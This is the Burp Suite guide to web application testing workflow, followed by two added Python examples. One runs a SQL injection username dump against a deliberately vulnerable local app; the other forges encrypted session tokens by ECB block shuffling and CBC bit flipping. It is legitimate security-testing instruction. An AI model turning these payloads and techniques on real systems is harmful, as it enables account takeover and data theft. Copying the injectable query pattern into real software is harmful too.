Using Burp Suite
The sections below describe the essentials of how to use Burp Suite
within your web application testing. For much more information about
general techniques and methodologies for web application testing, please refer to
The Web Application Hacker's Handbook,
which was co-authored by the creator of Burp Suite.
Note: Before starting to use Burp, you first need to get
Burp running, configure display settings, configure your browser and Burp to
work together, and ideally install Burp's SSL CA certificate in your
browser. If you need help with any of these areas, please see the help on
Getting started with Burp Suite.
Testing Workflow
Burp is designed to support the activities of a hands-on web application
tester. It lets you combine manual and automated techniques effectively,
gives you complete control over all of the actions that Burp performs, and
provides detailed information and analysis about the applications you are
testing.
Some users may not wish to use Burp in this way, and only want to perform
a quick and easy vulnerability scan of their application. If this is what
you need, please refer to Using Burp as
a Point-and-Click Scanner.
The diagram below gives a high-level overview of the key parts of Burp's
user-driven workflow; each area of the diagram is described in more detail in the sections that follow:
Recon and Analysis
The Proxy tool lies at the heart of Burp's
workflow. It lets you use your browser to navigate the application, while
Burp captures all relevant information and lets you easily initiate further
actions. In a typical test, the recon and analysis phase involves the
following tasks:
- Manually map the application - Using your browser
working through Burp Proxy,
manually map the application
by following links, submitting forms, and stepping through multi-step
processes. This process will populate the
Proxy history and Target site map with all of the
content requested, and (via
passive spidering) will add to
the site map any further
content that can be inferred from application responses (via links,
forms, etc.). You should then
review any unrequested
items (shown in gray in the site map), and request these using your
browser.
- Perform automated mapping where necessary - You can
optionally use Burp to automate the mapping process in various ways. You
can:
- Carry out automatic spidering to
request unrequested items in the site map. Be sure to review all the
Spider settings before
using this tool.
- Use the content
discovery function to find further content that is not linked
from visible content that you can browse to or spider.
- Perform custom
discovery using Burp Intruder, to cycle through lists of common
files and directories, and identify hits.
Note that
before performing any automated actions, it may be necessary to update
various aspects of Burp's configuration, such as
target scope and
session handling.
- Analyze the application's attack surface - The
process of mapping the application populates the Proxy
history and Target
site map with all the information that
Burp has captured about the application. Both of these repositories
contain features to help you
analyze the information
they contain, and assess the attack surface that the application
exposes. Further, you can use Burp's
Target Analyzer to
report the extent of the attack surface and the different types of URLs
the application uses.
Tool Configuration
Burp contains a wealth of configuration options,
which it is often necessary to use at different stages of your testing, to
ensure that Burp works with your target application in the way you require.
For example:
- Display - You can configure the
font and
character set used to
display HTTP messages, and also the
font in Burp's own UI.
- Target scope - The
target scope configuration tells Burp the items that you are
currently interested in and willing to attack. You should configure this
early in your testing, as it can control which items are displayed in the Proxy
history and Target
site map, which messages are
intercepted in the Proxy,
and which items may be spidered
and scanned.
- Authentication - If the application server employs
any platform-level (HTTP) authentication, you can configure Burp to handle
the authentication
automatically.
- Session handling - Many applications contain
features that can hinder automated or manual testing, such as reactive
session termination, use of per-request tokens, and stateful multi-stage
processes. You can configure Burp to
handle most of these situations seamlessly, using a combination of
session handling rules
and macros.
- Saving and restoring state - You can
save Burp's current
state at any time, and
restore it
later.
- Task scheduling - You can configure Burp to
schedule tasks at given
times or intervals, to allow you to work within specified testing
windows.
Vulnerability Detection and Exploitation
After completing your recon and analysis of the
target application, and any necessary configuration of
Burp, you can begin probing the application for common vulnerabilities. At
this stage, it is often most effective to use several Burp tools at once,
passing individual requests between different tools to perform
different tasks, and also going back to your browser for some tests.
Throughout Burp, you can use the
context menu to pass
items between tools and carry out other actions.
In Burp's default configuration, it automatically performs
live passive scanning
of all requests and responses that pass through the Proxy. So before you
begin actively probing the application, you might find that Burp Scanner has
already recorded some
issues that
warrant closer investigation.
Burp's tools can be used in numerous different ways to support the
process of actively testing for vulnerabilities. Some examples are described
below for different types of issues:
- Input-based bugs - For issues like SQL injection,
cross-site scripting, and file path traversal, you can use Burp in
various ways:
- You can perform active
scans using Burp Scanner. You can select items anywhere in Burp,
and initiate scans
using the context menu. Or you can configure Burp to do
live active
scanning of all in-scope requests passing through the Proxy.
- You can use Burp Intruder to perform
fuzzing, using your
own test strings and payload positions.
- You can send individual requests to
Burp Repeater, to manually modify
and reissue the request over and over.
- Having identified some types of bugs, you can actively exploit
these using Burp Intruder. For example, you can often use the
recursive grep
payload type to exploit SQL injection vulnerabilities, extracting data one
row per request by building each payload from a value captured in the
previous response.
- Logic and design flaws - For issues like unsafe use
of client-side controls, failure to enforce account lockout, and the
ability to skip key steps in multi-stage processes, you generally need
to work manually:
- Typically, a close review of the
Proxy history will identify
the relevant requests that need to be investigated.
- You can then probe the application's handling of unexpected
requests by issuing these individually using
Burp Repeater, or by turning on
Proxy interception and
manually changing requests on the fly while using your browser.
- You can actively exploit many logic and design flaws using
Burp
Intruder. For example, Intruder can be used to enumerate valid usernames, guess
passwords, cycle through predictable session tokens or password
recovery tokens, or even simply to reissue the same request a large
number of times (using the
null payloads
type).
- Having confirmed a logic or design flaw, you can often exploit it
actively by using Burp Proxy's
match/replace function,
or session handling
rules, to change requests in systematic ways.
- Access control issues - Burp contains several
features that can help when testing for access control vulnerabilities:
- You can use the
Compare site maps function for various tasks, including:
identifying functionality that is visible to one user and not
another; testing whether a low privileged user can access functions
that should be restricted to higher privileged users; and
discovering where user-specific identifiers are being used to
segregate access to data by two users of the same type.
- You can use different browsers to access the application in
different user contexts, and use a separate
Burp Proxy listener for
each browser (using different ports). You can then open additional
Proxy history windows (via the
context menu) and set the
display filter on each window to show only items received on a
specific listener port. As you use the application in each browser,
each history window will show only the items for the associated user
context. You can then use the "Request in browser" / "In current browser
session" function (via the context menu) to reissue a request captured
from one browser within the other browser's session, to determine how it
is handled in that user context.
- Many privilege escalation vulnerabilities arise when the
application passes a user identifier in a request parameter, and uses
that to identify the current user context. You can actively exploit
this type of vulnerability by using
Burp Intruder to cycle through identifiers in the appropriate
format (e.g. using the
numbers or
custom
iterator payload types) and configuring
extract grep items
to retrieve interesting user-specific data from the application's
responses.
- Other vulnerabilities - Burp contains functions
that can be used to deliver, and often automate, virtually any task that
arises when probing for other types of vulnerabilities. For example:
- You can review the contents of the Target
site map for information leakage
issues, using the
Search and Find
comments functions to assist you.
- Having identified a possible CSRF vulnerability, you can use the
CSRF generator to quickly
create a proof-of-concept attack in HTML, then use the "Test in
browser" function to load the attack into your browser, and then
review the browser results and
Proxy history to verify whether the attack was successful.
- You can use Burp Sequencer to
analyze a sample of session tokens from the application, and
estimate the quality of their randomness.
- For some types of encrypted session tokens or other parameters,
you can use the
bit flipper and
ECB block
shuffler payload types in Burp Intruder to blindly modify the
encrypted data in an attempt to meaningfully change the decrypted
data that the application processes.
- You can write your own custom Burp
extensions to carry out more specialized or customized tasks.
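The recursive grep technique mentioned under Input-based bugs above, reproduced outside Burp as an added worked example (this is not code from the original page or from PortSwigger). The target is a constructed in-memory SQLite application whose search parameter is concatenated into its query; the payload template and the extraction regex stand in for the Intruder payload position and grep-extract item, and each iteration builds the next payload from the value extracted from the previous response, which is exactly what the recursive grep payload type does.

```python
import re
import sqlite3


def build_target():
    """Constructed target: an in-memory SQLite database behind a search page."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE products (id INTEGER PRIMARY KEY, name TEXT)")
    db.executemany("INSERT INTO products (name) VALUES (?)", [("Widget",), ("Gadget",)])
    db.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, email TEXT)")
    db.executemany(
        "INSERT INTO users (username, email) VALUES (?, ?)",
        [("alice", "alice@example.test"), ("bob", "bob@example.test"),
         ("carol", "carol@example.test"), ("dave", "dave@example.test")],
    )
    return db


def search_page(db, q):
    """Deliberately vulnerable handler for GET /search?q=...: the parameter is
    concatenated straight into the SQL string (the flaw the text assumes)."""
    sql = "SELECT name FROM products WHERE name = '" + q + "'"
    rows = db.execute(sql).fetchall()
    if not rows:
        return "<p>No results</p>"
    return "<ul>" + "".join(f"<li>{r[0]}</li>" for r in rows) + "</ul>"


# Payload position: the q parameter. {prev} is the recursive grep placeholder,
# filled with whatever the grep-extract item captured from the last response.
# The UNION branch returns exactly one row: the next username after {prev}.
PAYLOAD = ("' UNION SELECT username FROM users WHERE username > '{prev}' "
           "ORDER BY 1 LIMIT 1--")

# Grep-extract item: the text between the first <li> and </li> in the response.
GREP_EXTRACT = re.compile(r"<li>(.*?)</li>")


def recursive_grep(send, template, extract, initial="", max_requests=1000):
    """Replay what Intruder's recursive grep payload does: derive each payload
    from the previous response, and stop when nothing can be extracted."""
    found, prev = [], initial
    for _ in range(max_requests):            # hard cap, as Intruder's payload count is
        response = send(template.format(prev=prev))
        match = extract.search(response)
        if match is None:                    # "No results": the walk is complete
            break
        prev = match.group(1)
        if prev in found:                    # guard against a query that stops advancing
            break
        found.append(prev)
    return found


def dump_usernames():
    db = build_target()
    return recursive_grep(lambda q: search_page(db, q), PAYLOAD, GREP_EXTRACT)


if __name__ == "__main__":
    print(dump_usernames())   # ['alice', 'bob', 'carol', 'dave']
```

The `ORDER BY 1 LIMIT 1` and the strict `>` comparison are what make the walk terminate: each response carries exactly the one row that sorts after the previous value, and the first empty response ends the enumeration. In Intruder the same loop is expressed as a payload position on `q`, a grep-extract item matching `<li>(.*?)</li>`, and the recursive grep payload type with an empty initial payload.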
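The bit flipper and ECB block shuffler attacks on encrypted tokens described under Other vulnerabilities above, as a second added example in Python (again not the page's own or PortSwigger's code). The token formats, the fixed-width fields, the key and the application functions are all constructed for the demonstration, and the block cipher is a toy Feistel construction built from HMAC-SHA256 so that the block runs with the standard library alone; both attacks depend only on the mode of operation, not on the cipher, and apply in the same way to AES-ECB and AES-CBC.

```python
import hashlib
import hmac
import os

BLOCK = 16
KEY = b"constructed-demo-key"   # assumption: a server-side key the attacker never sees


def _xor(a, b):
    return bytes(x ^ y for x, y in zip(a, b))


def _round_fn(key, rnd, half):
    """Keyed round function of the toy Feistel cipher (HMAC-SHA256, truncated)."""
    return hmac.new(key, bytes([rnd]) + half, hashlib.sha256).digest()[:BLOCK // 2]


def block_encrypt(key, block, rounds=8):
    left, right = block[:BLOCK // 2], block[BLOCK // 2:]
    for rnd in range(rounds):
        left, right = right, _xor(left, _round_fn(key, rnd, right))
    return left + right


def block_decrypt(key, block, rounds=8):
    left, right = block[:BLOCK // 2], block[BLOCK // 2:]
    for rnd in reversed(range(rounds)):
        left, right = _xor(right, _round_fn(key, rnd, left)), left
    return left + right


def _blocks(data):
    return [data[i:i + BLOCK] for i in range(0, len(data), BLOCK)]


def ecb_encrypt(key, plain):
    # ECB: every block is encrypted independently, so equal plaintext blocks give
    # equal ciphertext blocks and blocks can be cut, copied and reordered.
    return b"".join(block_encrypt(key, b) for b in _blocks(plain))


def ecb_decrypt(key, cipher):
    return b"".join(block_decrypt(key, b) for b in _blocks(cipher))


def cbc_encrypt(key, iv, plain):
    out, prev = [], iv
    for b in _blocks(plain):
        prev = block_encrypt(key, _xor(b, prev))
        out.append(prev)
    return b"".join(out)


def cbc_decrypt(key, iv, cipher):
    # CBC: P[i] = D(C[i]) XOR C[i-1] (with C[-1] = IV), so a bit flipped in C[i-1]
    # flips the same bit in P[i] and garbles P[i-1] (nothing, when C[i-1] is the IV).
    out, prev = [], iv
    for c in _blocks(cipher):
        out.append(_xor(block_decrypt(key, c), prev))
        prev = c
    return b"".join(out)


# ECB block shuffler: constructed token holding two fixed-width 16-byte fields.
def issue_ecb_token(name, role, key=KEY):
    return ecb_encrypt(key, f"{name:<16}{role:<16}".encode())


def parse_ecb_token(token, key=KEY):
    plain = ecb_decrypt(key, token)
    return plain[:BLOCK].decode().strip(), plain[BLOCK:].decode().strip()


def ecb_block_shuffle(token, order):
    """Rebuild a token from its ciphertext blocks in a chosen order; blocks may be
    repeated or dropped, which is what Intruder's ECB block shuffler cycles through."""
    blocks = _blocks(token)
    return b"".join(blocks[i] for i in order)


def forge_admin_role():
    # The attacker registers with the name "admin" (a value the app lets them pick),
    # then copies the encrypted name block into the role position.
    token = issue_ecb_token("admin", "user")
    return parse_ecb_token(ecb_block_shuffle(token, [0, 0]))   # ('admin', 'admin')


# Bit flipper: constructed CBC token with the IV prepended to the ciphertext.
def issue_cbc_token(plain, key=KEY):
    iv = os.urandom(BLOCK)
    return iv + cbc_encrypt(key, iv, plain)


def parse_cbc_token(token, key=KEY):
    return cbc_decrypt(key, token[:BLOCK], token[BLOCK:])


def flip_byte(token, offset, old, new):
    """XOR one token byte so that the plaintext byte one block later changes old -> new."""
    forged = bytearray(token)
    forged[offset] ^= old ^ new
    return bytes(forged)


def forge_admin_flag():
    token = issue_cbc_token(b"admin=0;uid=1337")                     # exactly one block
    forged = flip_byte(token, len(b"admin="), ord("0"), ord("1"))    # byte 6 of the IV
    return parse_cbc_token(forged)                                   # b'admin=1;uid=1337'
```

Intruder's bit flipper works without knowing the plaintext: it flips each bit of the token in turn and you watch the responses for a changed user context or a decryption error. Real tokens are usually base64- or hex-encoded, so decode before shuffling or flipping and re-encode afterwards. Before spending time on either attack, check whether the token is integrity protected (an HMAC or authenticated encryption mode): if any single-bit change is rejected outright, the application is verifying the ciphertext and these manipulations will not succeed.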
Read More
There is extensive documentation for all of Burp's tools and
features, and for the typical workflow you need to use when testing with
Burp. See the help for each of the main Burp tools for details of how to
use it.